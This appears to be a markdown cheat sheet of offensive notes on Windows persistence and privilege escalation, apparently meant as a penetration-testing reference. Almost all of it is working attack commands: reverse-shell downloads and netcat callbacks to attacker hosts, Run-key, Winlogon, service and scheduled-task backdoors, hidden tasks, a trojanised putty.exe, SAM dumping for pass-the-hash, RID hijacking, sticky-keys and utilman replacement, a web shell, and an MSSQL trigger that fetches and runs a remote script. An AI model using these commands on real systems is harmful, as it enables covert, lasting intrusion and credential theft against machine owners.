killchain-compendium/Persistence/persistence.md

# Persistence

* Gain through
    * Startup folder persistence
    * Editing registry keys
    * Scheduled tasks
    * SUID
    * BITS
    * Creating a backdoored service
    * Creat user
    * RDP

## Gain Persistence on Windows

### Internet Explorer 

Open the Internet Explorer Browser and add a malicious URL to trusted sites.
The now trusted URLs could be shell or any other file that can be downloaded via the browser now.

### Powershell

Open Powershell and download the reverse shell via
```sh
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
```

### CMD.exe

Open cmd.exe and download the reverse shell via
```sh
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
```

* In Metasploit use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp` 

### Paths to Persistence

* Put in startup directory
```sh
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```

* Put the reverse shell into `%appdata%` and add a registry key
```sh
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 
```

### Background Intelligence Transfer Service (BITS)

BITS is a background process included in Windows to transfer data (files) between machines while the system is on idle. 
The bitsadmin can be used directly via Powershell or cmd.exe to transfer malicious files.
```sh
bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
```

```sh
bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume
```

## Elevate Privileges

Create user `net user /add <user> <pass>`.
Add the user to the administrators group via `net localgroup administrators <user> /add`.
Assert the result via `net localgroup Administrator`

### More stealthy methods

`Backup Operator` group is more stealthy method than using the administrators group.
The following two groups are assigned through membership of `Backup Operators`
* `SeBackupPrivilege`, read files
* `SeRestorePrivilege`, write files

```sh
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add
```

#### RDP

An RDP login gets special treatment. Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
```sh
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```

Afterwards, check if `Backup Operators` is enabled via `whoami /groups`.
Backup `SAM` and `SYSTEM` via 

```sh
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
```

Found hashes inside the dump can be used to Pass-the-hash via evil-winrm

### secedit

* Get r/w on files through editing a config file
* Export secedit and open it 
```sh
secedit /export /cfg config.inf
```
* Add user to the groups
```sh
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
```
* Convert the file
```sh
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
```
* Add the user to the RDP group via net localgroup like before or do
```sh
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
```
* Add & Click user -> Full Control(All Operations)
* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before

### Relative ID (RID)

* UID like in linux
    * Administrator has `RID = 500`
    * Other interactive users `RID >= 1000`
* Get RIDs
```sh
 wmic useraccount get name,sid
```
* Assign `500` to regular user
```sh
 PsExec64.exe -i -s regedit
```
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
* Search for RID value as hexadecimal value
* Open the key called `F` and change effective RID at position `0x30`
* Insert LE hex of `0d500`, which is `f401`

## Add to registry

* Execute on user logon via
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```

## Add a Service

### Meterpreter

* Inside meterpreter `load powershell` and `powershell_shell`
```sh
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
```

### Powershell

* Start a service automatically
```sh
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
```

* Use a service PE instead
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
```

* Modify an existing service
    * Enumerate all the services
```sh
sc.exe query state=all
```
    * Info about a specific service, start type should be automatic, service start name should be target user
```sh
sc.exe qc <ServiceName>
```
    * Reconfigure
```sh
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
```

## Add Scheduled Task

```sh
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```

* Alternatively via `schtasks`
```sh
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
```
    * Check task
```sh
schtasks /query /tn SteamUpdater
```

* Deleting Security Descriptor of a task to make it invisible. Delete the following key
```sh
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
```

## File Backdoor

### Mimic PE
```sh
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
```

### Reference Script
* Recycle shortcut of an app to reference a reverse shell script
    * Right click -> `Properties` -> `Target`
* Reference the the script `certainlynobackdoor.ps1` via 
```sh
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
```
* Content of the script `certainlynobackdoor.ps1`
```sh
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe
```

### File Association

* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
* Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1` 
* Chang the argument to a shell script and pass the arg through it
```sh
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```
* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`


## Persistence via Logon 

### Startup directories
* Users' Startup directory under
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```

* Startup directory for all users, put the reverse shell here
```sh
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```

### Registry Keys

* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`

* Create `Expandable String Value` under any of this keys with the value of the reverse shell path


* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
    * Either `shell` or `Userinit` can be appended with a comma separated command

### Logon Scripts

* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts

* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload


## RDP or Login Screen

### Sticky Keys
* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
* Take ownership of the binary via
```sh
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
```
* Overwrite with `cmd.exe` 
```sh
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```

### Utilman

* Ease of access button is clickable at the login screen, it is executed with system privileges 
* Take ownership and overwrite with `cmd.exe`
```sh
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```

## Web Shell

* Default user is `iis apppool\defaultapppool`
* Has `SeImpersonatePrivilege` 

* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
* Move shell to `C:\inetpub\wwwroot` on target
* Get the shell via `http://$TARGET_IP/shell.aspx`

## MSSQL

* Triggers bind actions such as INSERTs

* Open Microsoft SQL Server Management Studio
    * Choose windows auth
    * `New Query`
    * Enable Advance Options via
```sh
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
```
    * Grant privileges to all users
```sh
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
```

    * Change to DB
```sh
USE <DATABASE>
```

    * Create trigger
```sh
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
```

* Trigger the trigger by visiting the site which triggers the trigger through a db call